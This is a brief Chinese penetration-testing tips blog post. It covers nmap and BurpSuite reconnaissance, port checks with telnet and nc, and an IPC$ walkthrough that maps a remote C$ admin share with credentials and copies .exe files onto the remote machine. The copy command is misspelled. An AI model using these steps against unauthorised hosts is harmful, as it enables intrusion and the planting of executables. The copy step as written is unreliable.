渗透测试小经验(一)

本文介绍了一些基本的渗透测试方法,包括使用nmap进行信息收集、利用BurpSuite进行漏洞分析等。还介绍了如何通过telnet和nc命令测试端口是否开放,并演示了利用IPC$漏洞进行远程文件操作的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、信息收集
nmap扫描
二、漏洞发现、利用
web页面回显F12查看,BurpSuite分析

tips
测试端口是否开放:

telnet IP port
nc -nv IP port

漏洞利用之IPC$

前提:假设开启了文件共享,将远程共享文件夹映射到本地的F盘

net use f: \\10.235.15.2\share 远程密码 /user:用户

查看映射列表

net use

删除

net use f: /del
net use * /del

访问远程其他盘

net use f: \\10.235.15.2\c$ 远程密码 /user:用户

copy文件到别人的机器上。

cpoy f:*.exe  //10.235.15.2/c$/kk/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值